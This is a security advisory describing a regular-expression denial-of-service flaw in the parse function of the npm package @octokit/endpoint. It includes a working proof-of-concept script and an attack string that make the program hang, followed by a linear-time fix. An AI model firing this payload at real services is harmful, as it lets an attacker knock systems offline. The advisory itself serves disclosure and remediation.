
### Summary

By crafting specific `options` parameters, the `endpoint.parse(options)` call can be made to trigger a regular expression denial of service (ReDoS). The program hangs and CPU utilization stays high.

### Details

The issue is in the `parse` function in `parse.ts` of the npm package `@octokit/endpoint`, at line 62 of https://github.com/octokit/endpoint.js/blob/main/src/parse.ts:

```ts
headers.accept.match(/[\w-]+(?=-preview)/g) || ([] as string[]);
```

The regular expression `/[\w-]+(?=-preview)/g` has a backtracking problem when it processes a long run of word characters followed by a `-` symbol: from every start position the greedy `[\w-]+` consumes the rest of the run and then backs off one character at a time while the lookahead keeps failing, so the work grows with the square of the input length. E.g., the attack string:

```js
"" + "A".repeat(100000) + "-"
```

### PoC

Reproduction steps:

1. Run `npm i @octokit/endpoint`.
2. Move `poc.js` to the root directory, at the same level as `README.md`.
3. Run `node poc.js`.
4. Result: the program hangs forever with high CPU usage.

```js
import { endpoint } from "@octokit/endpoint";
// import { parse } from "./node_modules/@octokit/endpoint/dist-src/parse.js";

const options = {
  method: "POST",
  url: "/graphql", // Ensure that the URL ends with "/graphql"
  headers: {
    accept: "" + "A".repeat(100000) + "-", // Pass in the attack string
    "content-type": "text/plain",
  },
  mediaType: {
    previews: ["test-preview"], // Ensure that mediaType.previews exists and has values
    format: "raw", // Optional …
```
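A linear-time way to pull preview names out of the Accept header, added here as an example and not code from `@octokit/endpoint`: it returns the same names as the line-62 expression on well-formed headers but visits each character a bounded number of times, so the attack string above returns immediately. The function names `extractPreviews` and `previewsWithOriginalRegex` are assumptions.

```javascript
// Added example, not code from @octokit/endpoint. Function names are assumptions.

// The pattern from parse.ts line 62, kept only for a small-input comparison.
// Its cost grows quadratically on "A".repeat(n) + "-": at every start position the
// greedy [\w-]+ runs to the end and then backs off one character at a time.
const ORIGINAL_PREVIEW_RE = /[\w-]+(?=-preview)/g;

function previewsWithOriginalRegex(accept) {
  // Same expression as the advisory's line 62; only call this with short input.
  return accept.match(ORIGINAL_PREVIEW_RE) || [];
}

// Linear-time replacement: locate each literal "-preview" marker with indexOf and
// scan backwards over [\w-] to recover the name, never crossing the end of the
// previous match, so forward and backward scans together cover the string once.
function extractPreviews(accept) {
  const marker = "-preview";
  const nameChar = /[\w-]/;
  const previews = [];
  let from = 0;
  for (;;) {
    const at = accept.indexOf(marker, from);
    if (at === -1) break;
    let start = at;
    while (start > from && nameChar.test(accept[start - 1])) start--;
    if (start < at) previews.push(accept.slice(start, at));
    from = at + marker.length;
  }
  return previews;
}

// Constructed inputs: a well-formed Accept header and the advisory's attack string.
const NORMAL = "application/vnd.github.foo-preview+json,application/vnd.github.bar-baz-preview";
const ATTACK = "" + "A".repeat(100000) + "-";

// Both functions return ["foo", "bar-baz"] on the normal header; the safe version
// returns [] on the attack string at once instead of pinning the CPU.
console.log(extractPreviews(NORMAL), extractPreviews(ATTACK).length);
```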